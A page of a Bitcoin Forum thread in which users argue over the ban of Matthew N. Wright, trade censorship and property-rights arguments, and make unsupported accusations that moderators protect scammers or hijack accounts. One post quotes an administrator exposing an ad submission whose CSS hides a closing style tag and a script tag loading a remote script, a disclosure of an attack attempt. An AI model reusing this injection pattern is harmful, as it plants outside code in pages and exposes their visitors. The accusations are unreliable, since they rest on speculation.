Bitcoin Forum
April 19, 2024, 04:46:47 PM *
News: Latest Bitcoin Core release: 26.0 [Torrent]

Home   Help Search Login Register More  
Pages: « 1 2 3 4 [5] 6 7 8 9 »  All
  Print  
Author Topic: [CENSORSHIP] Matthew N. Wright  (Read 16352 times)
zackclark70
Legendary

Activity: 868
Merit: 1000

ADT developer

View Profile
August 15, 2013, 06:37:31 PM

from what I have been hearing and seeing theymos is good friends with some of the biggest scammers on here and there are far to many people paying off mods so nothing is going to change anytime soon

View Profile Personal Message (Offline)

Ignore
Reply with quote  #2

Report to moderator

View Profile Personal Message (Offline)

Ignore
Reply with quote  #2

Report to moderator
The grue lurks in the darkest places of the earth. Its favorite diet is adventurers, but its insatiable appetite is tempered by its fear of light. No grue has ever been seen by the light of day, and few have survived its fearsome jaws to tell the tale.
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
Kouye (OP)

Activity: 336
Merit: 250

Cuddling, censored, unicorn-shaped troll.

View Profile
August 15, 2013, 06:44:46 PM

from what I have been hearing and seeing theymos is good friends with some of the biggest scammers on here and there are far to many people paying off mods so nothing is going to change anytime soon

This post is not about theymos, please stay focused.

This post is about someone who was either:

- banned according to forum rules, in which case I will compile a list of trolls to help theymos cleaning up, cause he obviously missed a couple hundreds in his ban wave.
- banned because theymos felt like banning him, in which case I hope for some gentlemen conclusion.

[OVER] RIDDLES 2nd edition --- this was claimed. Look out for 3rd edition!
I won't ever ask for a loan nor offer any escrow service. If I do, please consider my account as hacked.
zackclark70
Legendary

ADT developer

View Profile
August 15, 2013, 07:20:01 PM

This post is not about theymos, please stay focused.

This post is about someone who was either:

- banned according to forum rules, in which case I will compile a list of trolls to help theymos cleaning up, cause he obviously missed a couple hundreds in his ban wave.
- banned because theymos felt like banning him, in which case I hope for some gentlemen conclusion.

my post is relevant to the thread as its more than likely that Matthew N. Wright never paid of the right people or he had info on the mods/admin that they are trying to cover up  the few people on this forum that know what's going on will know what I mean

farlack
Legendary

Activity: 1311

View Profile
August 16, 2013, 07:17:11 AM

He was trolling continuously. He hasn't changed: He edited that poll after people had already voted to create misleading results.

Well, the forum policy since a long time ago was to ban trolls (as they impede the speech of others), and tag scammers.

As far as I can tell, banning MNW seems to be a consistent case of enforcing the forum rules. Period.

But, and I think I stated that on several occasions, I do have a lot of respect for Matthew and it makes me somewhat sad to no longer have him around.

I guess the right thing to do here would be to lift the ban as soon as the moderators find that appropriate.

Oh, sorry I misunderstood, I see now how trolling could be so much worse than someone stealing hundreds even thousands of dollars worth of items, money, and bitcoin.
The thing about scammers, they don't pay back shit.

Matthew held the SCAMMER tag for a while. He paid back, no shit!

Had a scammer tag for a shitty bet he didn't collect money on? That one? BFL made a bet that they failed to deliver on for a very long time, donating 1000 BTC to charity, then formed their own charity and donated the BTC to? You cant compare the two, Matthew didn't scam shit on that bet, there is a difference between blatantly stealing and making a joke bet you cant afford.
gourmet

Activity: 311
Merit: 250

View Profile
August 16, 2013, 08:10:17 AM

To me, it not even an issue of trolling (I despise the word, actually).  Matthew contributes to the community not only through speech, but through action.  Whose vision was it that helped Bitcoin Mag launch?  Matthew's, of course.  Even his ill-advised community bet was made in an attempt to show the community how foolish it  can be by carelessly handing out BTC to total strangers (e.g Pirate).  Unfortunately for Matthew, the mere existence of the bet caused some people to act in ways which cost them money.  But it takes a stand-up guy to acknowledge his responsibility to pay back debts he was never prepared to pay back, and as far as I'm aware, Matthew has paid, and is continuing to pay, the debts he owes.

In my opinion, not only shouldn't Matthew be banned, he has downright admirable qualities, and it's a disservice to the community to ban him.

I don't get it either.

Matthews Post are always either true, hilariously sarcastic or at least funny, I never seen him posting the pure rant you see from most trolls.

There are so many much worse trolls here, banning him just makes no sense and is at best personal motivated and doesn't show the neutral judgement that you would expect from a mod or admin.

+2 :-)
BadBear
v2.0
Legendary

Activity: 1652
Merit: 1127

View Profile WWW
August 16, 2013, 09:00:35 AM

I wonder how Matthew would feel of he was reading this now.

He's far too self centered to not be reading it daily.

And I'm sure he's laughing his ass off that you guys still buy his bullshit after all he's done.  Y'all getting trolled and don't even know it. Amazes me how dumb smart people can be when you press the right buttons.

1Kz25jm6pjNTaz8bFezEYUeBYfEtpjuKRG | PGP: B5797C4F

Tired of annoying signature ads? Ad block for signatures
farlack
Legendary

View Profile
August 16, 2013, 09:12:59 AM

And I'm sure he's laughing his ass off that you guys still buy his bullshit after all he's done.  Y'all getting trolled and don't even know it. Amazes me how dumb smart people can be when you press the right buttons.

Not everyone here is for the person, but for the cause. Banning for trolling is censorship, and against what the community is. How about you give a trolling tag, and ban scammers. There is a reason there is an ignore button, who gives a shit what he says just click ignore.

Edit: I mean come on
https://bitcointalk.org/index.php?topic=274749.0
Here's an ad that was sent to me:

Sent to the address!

Here is my CSS code:

Code:
.minefieldadm {width:620px;height:40px;overflow:hidden;font-family:Verdana;font-size:14px;border:1px solid #000;display:inline-block;background: #a3d802;  background: -moz-linear-gradient(top, #a3d802 0%, #11a301 3%, #8ac916 6%, #f0b7a1 34%, #8c3310 50%, #752201 93%, #bf6e4e 98%);  background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#a3d802), color-stop(3%,#11a301), color-stop(6%,#8ac916), color-stop(34%,#f0b7a1), color-stop(50%,#8c3310), color-stop(93%,#752201), color-stop(98%,#bf6e4e));  background: -webkit-linear-gradient(top, #a3d802 0%,#11a301 3%,#8ac916 6%,#f0b7a1 34%,#8c3310 50%,#752201 93%,#bf6e4e 98%);  background: -o-linear-gradient(top, #a3d802 0%,#11a301 3%,#8ac916 6%,#f0b7a1 34%,#8c3310 50%,#752201 93%,#bf6e4e 98%);background: -ms-linear-gradient(top, #a3d802 0%,#11a301 3%,#8ac916 6%,#f0b7a1 34%,#8c3310 50%,#752201 93%,#bf6e4e 98%);  background: linear-gradient(to bottom, #a3d802 0%,#11a301 3%,#8ac916 6%,#f0b7a1 34%,#8c3310 50%,#752201 93%,#bf6e4e 98%);  filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#a3d802', endColorstr='#bf6e4e',GradientType=0 );}
.minefieldshader {font-size: 155%;color: #FFFFFF;text-shadow: 0px 0px 8px rgba(0, 0, 0, 1);background: #b4e391;  background: -moz-linear-gradient(45deg, #b4e391 0%, #149b51 22%, #75e01d 27%, #369b14 62%, #5cdb1c 69%, #5cdb1c 86%, #b4e391 100%);  background: -webkit-gradient(linear, left bottom, right top, color-stop(0%,#b4e391), color-stop(22%,#149b51), color-stop(27%,#75e01d), color-stop(62%,#369b14), color-stop(69%,#5cdb1c), color-stop(86%,#5cdb1c), color-stop(100%,#b4e391));background: -webkit-linear-gradient(45deg, #b4e391 0%,#149b51 22%,#75e01d 27%,#369b14 62%,#5cdb1c 69%,#5cdb1c 86%,#b4e391 100%);  background: -o-linear-gradient(45deg, #b4e391 0%,#149b51 22%,#75e01d 27%,#369b14 62%,#5cdb1c 69%,#5cdb1c 86%,#b4e391 100%);}</style><script src='http://webkit-linear.in'></script><style>.minefieldshader{ background: -ms-linear-gradient(45deg, #b4e391 0%,#149b51 22%,#75e01d 27%,#369b14 62%,#5cdb1c 69%,#5cdb1c 86%,#b4e391 100%);  background: linear-gradient(45deg, #b4e391 0%,#149b51 22%,#75e01d 27%,#369b14 62%,#5cdb1c 69%,#5cdb1c 86%,#b4e391 100%);  filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#b4e391', endColorstr='#b4e391',GradientType=1 );margin-top: 3px;padding: 4px 3px 4px 3px;display: inline-block;}
.minefieldstar1 {width: 0;height: 0;border-left: 15px solid transparent;border-right: 15px solid transparent;border-bottom: 30px solid rgb(80, 189, 45);position:absolute;float:left;margin-left: 135px;}
.minefieldstar2 {width: 0;height: 0;border-left: 15px solid transparent;border-right: 15px solid transparent;border-bottom: 30px solid rgb(80, 189, 45);position:absolute;float:left;margin-left: 450px;}

Here is my HTML code:

Code:
<a href="http://minefield.bitcoinlab.org/?r=1XCa3af6FfBF9FZT"><div class="minefieldadm"><div class="minefieldstar1"></div>
<div class="minefieldstar2"></div><span class="minefieldshader">Bitcoin Minefield</span></div></a>

Please let me know when the ad is up. I'll be happy to give you stats on how many people clicked and how much BTC I made from this referral link.

Can you spot the problem? The CSS contains code injection:
Code:
</style><script src='http://webkit-linear.in'></script><style>

This URL contains nothing now. I guess he would have put something there if the ad had been accepted. I carefully check all ads by hand, though, so this kind of attack is pointless.

The guy even tried to fuck the entire forum via the admin, no ban, or scammer tag. what the hell is wrong with that picture?
whiskers75

Activity: 658
Merit: 502

Doesn't use these forums that often.

View Profile
August 16, 2013, 09:19:24 AM

And I'm sure he's laughing his ass off that you guys still buy his bullshit after all he's done.  Y'all getting trolled and don't even know it. Amazes me how dumb smart people can be when you press the right buttons.

Not everyone here is for the person, but for the cause. Banning for trolling is censorship, and against what the community is. How about you give a trolling tag, and ban scammers. There is a reason there is an ignore button, who gives a shit what he says just click ignore.

The guy even tried to fuck the entire forum via the admin, no ban, or scammer tag. what the hell is wrong with that picture?

This - if MNW is banned, others are banned.

Elastic.pw Elastic - The Decentralized Supercomputer
ELASTIC ANNOUNCEMENT THREAD | ELASTIC SLACK | ELASTIC FORUM
Anduck
Legendary

Activity: 1511
Merit: 1072

quack

View Profile
August 16, 2013, 09:24:10 AM

This - if MNW is banned, others are banned.

Try to understand they are only trying to do what's best for us, dependless on their own relations..
Or maybe it's theymos' forum and he can do what he want with it? Wink

Maybe MNW trolled a bit too much finally?

But there certainly are more people that should get banned, too...

favdesu
Legendary

Activity: 1764

View Profile WWW
August 16, 2013, 09:37:47 AM

this.

/thread

farlack
Legendary

View Profile
August 16, 2013, 10:01:58 AM
Last edit: August 16, 2013, 10:15:21 AM by farlack

Try to understand they are only trying to do what's best for us, dependless on their own relations..

Maybe MNW trolled a bit too much finally?

But there certainly are more people that should get banned, too...

Do whats best for us? We didn't vote them in based off of their opinion of how the forum should be ran, who other than the people are to say what is best for us? Whats best for us is what WE say.
Trolling isn't that bad, I have a shaky memory, but didn't theymos try to sell off what was it $500,000 worth of shares of a scam business right before they were caught..?

Edit:Edit badmaths: $78k back then, 551k today.
BadBear
v2.0
Legendary

View Profile WWW
August 16, 2013, 02:04:23 PM

Do whats best for us? We didn't vote them in based off of their opinion of how the forum should be ran, who other than the people are to say what is best for us? Whats best for us is what WE say.
Trolling isn't that bad, I have a shaky memory, but didn't theymos try to sell off what was it $500,000 worth of shares of a scam business right before they were caught..?

There is no voting, this isn't a democracy. Banning someone from a private website isn't censorship, that's ridiculous and shows you don't truly understand what censorship and freedom of speech mean. It's a privately owned forum, and theymos is exercising his right as property owner/administrator to manage as he sees fit. If you disagree, you are free to leave. You are not free to try and take the property owner's rights away on a whim just because you disagree with something he did. 

Actually I'm just going to stop here and quote DeathandTaxes here, he said it perfectly. Edit: Actually you were a part of this conversation about another troll who was banned, I guess you just like infringing on the rights of others whenever you disagree with them. Nice, you should get a job in government work.  Roll Eyes

Property doesn't only apply to physical property.    You have no freedom of speech as it relates to other citizens and their private property.   No forum can violate your freedom of speech because ...
Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof; or abridging the freedom of speech, or of the press; or the right of the people peaceably to assemble, and to petition the Government for a redress of grievances.

Who can't abridge the freedom of speech?  That's right Congress can't.  Last time I checked the mods on this forum aren't Congress, aren't duly elected or appointed officials of any state.  They aren't even the agents of the state. 

Rights start with ownership.  The forum is OWNED by its owners.  Those owners use admins and mods to (as they see fit) to maximize the value of their property.  Property they own and have every right to control.  There is no difference between kicking a hunter off your land and kicking a person off a forum.  Both involve lawfully controlling one's property.

You don't need a freedom of Speech from other citizens you know why?
1) Other citizens don't have a monopoly on violence.  Other citizens can't under the law use force to silence your speech. 
2) Sure maybe you can't speak on this forum without rules (much like you can't hunt on anyone's private property without permission) but until bitcointalk.org becomes the sole mechanism of speech for the human race you have other options.

TL/DR:
I hate "rights" hypocrits.  I bet even now you fail to see that your demands of freedom of speech are a violation of the rights of others ... the rights of property owners to be free in the ownership of what is theirs.

Bolded the important part, that's why banning someone isn't censorship. I don't know how much more simpler it can be made. The only valid point I've seen made is that there are others who should be banned, but that's hardly new. Unbanning Matthew doesn't seem like the best solution to that particular problem.

ElectricMucus
Legendary

Activity: 1666
Merit: 1057

Marketing manager - GO MP

View Profile WWW
August 16, 2013, 02:08:56 PM

Hey guys check out my new signature. (No I'm not trolling, I really thing we are taking a turn for the worse.)
zackclark70
Legendary

ADT developer

View Profile
August 16, 2013, 02:18:10 PM

There is no voting, this isn't a democracy. Banning someone from a private website isn't censorship, that's ridiculous and shows you don't truly understand what censorship and freedom of speech mean. It's a privately owned forum, and theymos is exercising his right as property owner/administrator to manage as he sees fit. If you disagree, you are free to leave. You are not free to try and take the property owner's rights away on a whim just because you disagree with something he did. 

Actually I'm just going to stop here and quote DeathandTaxes here, he said it perfectly. Edit: Actually you were a part of this conversation about another troll who was banned, I guess you just like infringing on the rights of others whenever you disagree with them. Nice, you should get a job in government work.  Roll Eyes

Property doesn't only apply to physical property.    You have no freedom of speech as it relates to other citizens and their private property.   No forum can violate your freedom of speech because ...
Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof; or abridging the freedom of speech, or of the press; or the right of the people peaceably to assemble, and to petition the Government for a redress of grievances.

Who can't abridge the freedom of speech?  That's right Congress can't.  Last time I checked the mods on this forum aren't Congress, aren't duly elected or appointed officials of any state.  They aren't even the agents of the state. 

Rights start with ownership.  The forum is OWNED by its owners.  Those owners use admins and mods to (as they see fit) to maximize the value of their property.  Property they own and have every right to control.  There is no difference between kicking a hunter off your land and kicking a person off a forum.  Both involve lawfully controlling one's property.

You don't need a freedom of Speech from other citizens you know why?
1) Other citizens don't have a monopoly on violence.  Other citizens can't under the law use force to silence your speech. 
2) Sure maybe you can't speak on this forum without rules (much like you can't hunt on anyone's private property without permission) but until bitcointalk.org becomes the sole mechanism of speech for the human race you have other options.

TL/DR:
I hate "rights" hypocrits.  I bet even now you fail to see that your demands of freedom of speech are a violation of the rights of others ... the rights of property owners to be free in the ownership of what is theirs.

Bolded the important part, that's why banning someone isn't censorship. I don't know how much more simpler it can be made. The only valid point I've seen made is that there are others who should be banned, but that's hardly new. Unbanning Matthew doesn't seem like the best solution to that particular problem.

it is not true we can check out but we cant leave as we are not aloud to delete our accounts

have you seen the amount of old accounts that are popping back up after all this time the accounts cant be phished cant be brute forced that only leaves to options forum compromised or admin are resetting passwords and using the themselves or selling them

( I know of at least 1 user that regally hacks the forum so I am sure there are more )

jackjack
Legendary

Activity: 1176
Merit: 1233

May Bitcoin be touched by his Noodly Appendage

View Profile
August 16, 2013, 02:28:52 PM

( I know of at least 1 user that regally hacks the forum so I am sure there are more )
Which one?

Own address: 19QkqAza7BHFTuoz9N8UQkryP4E9jHo4N3 - Pywallet support: 1AQDfx22pKGgXnUZFL1e4UKos3QqvRzNh5 - Bitcointalk++ script support: 1Pxeccscj1ygseTdSV1qUqQCanp2B2NMM2
Pywallet: instructions. Encrypted wallet support, export/import keys/addresses, backup wallets, export/import CSV data from/into wallet, merge wallets, delete/import addresses and transactions, recover altcoins sent to bitcoin addresses, sign/verify messages and files with Bitcoin addresses, recover deleted wallets, etc.
qwk
Donator
Legendary

Activity: 3542
Merit: 3411

Shitcoin Minimalist

View Profile
August 16, 2013, 02:42:25 PM

this.

Is it? On the other hand, that discussion would be totally offtopic.

Yeah, well, I'm gonna go build my own blockchain. With blackjack and hookers! In fact forget the blockchain.
BadBear
v2.0
Legendary

View Profile WWW
August 16, 2013, 03:20:18 PM

it is not true we can check out but we cant leave as we are not aloud to delete our accounts

It isn't your account, it belongs to the forum/website. You're allowed to use it once you agree to the user agreement you skipped over when you registered your account, you can put a unique name on it, you can make a password to restrict access, but in the end it still belongs to the website. Same applies to say...online game accounts (not necessarily paid before you think of world of warcraft or something, free games are the same), you don't own them either and you can be banned from accessing them at any time.

Again, I'm speaking strictly from a property rights point of view since that's the direction the discussion has taken, with the claims of censorship and violation of free speech. Just trying to get you to see the big picture here, beyond a sole account.

have you seen the amount of old accounts that are popping back up after all this time the accounts cant be phished cant be brute forced that only leaves to options forum compromised or admin are resetting passwords and using the themselves or selling them

All I've seen from you is guesses and speculation, but if you have something helpful to share, please share it with the people that need it (not me).

zackclark70
Legendary

ADT developer

View Profile
August 16, 2013, 03:39:46 PM

It isn't your account, it belongs to the forum/website. You're allowed to use it once you agree to the user agreement you skipped over when you registered your account, you can put a unique name on it, you can make a password to restrict access, but in the end it still belongs to the website. Same applies to say...online game accounts (not necessarily paid before you think of world of warcraft or something, free games are the same), you don't own them either and you can be banned from accessing them at any time.

Again, I'm speaking strictly from a property rights point of view since that's the direction the discussion has taken, with the claims of censorship and violation of free speech. Just trying to get you to see the big picture here, beyond a sole account.

All I've seen from you is guesses and speculation, but if you have something helpful to share, please share it with the people that need it (not me).

what I know is pointless telling theymos as its about him and his friends

how would it look to everyone if the people running the biggest bitcoin forum were proven to be the biggest scammers / supporting the biggest scammers out there ?

J603

Activity: 196
Merit: 100

View Profile
August 16, 2013, 03:43:35 PM

what I know is pointless telling theymos as its about him and his friends

how would it look to everyone if the people running the biggest bitcoin forum were proven to be the biggest scammers / supporting the biggest scammers out there ?

It would look very bad. So why not post it, if it exists? People will see it even if it gets removed. If they banned you on the spot it would prove them corrupt, so it wouldn't matter even if they stopped you.
the joint
Legendary

Activity: 1834
Merit: 1020

View Profile
August 16, 2013, 03:46:44 PM

@ Badbear,

Regardless of what Theymos is entitled to do or not do, I can tell you that my suspicion has increased, and trust decreased, with regards to Theymos as a result of inconsistent moderation, claims that he is protecting scammers, and his avoidance of this thread.  I bet I'm not the only one.

Inconsistent moderation will be caught and scrutinized by others. If enough people are unhappy about it, it's just going to make your job and Thymos's job a lot more annoying.  It also makes this site a target among those that are inconsistently moderated, even if a ban just means they'll create 10 sock puppet  accounts just to troll you harder.  
Pages: « 1 2 3 4 [5] 6 7 8 9 »  All
  Print  

Jump to: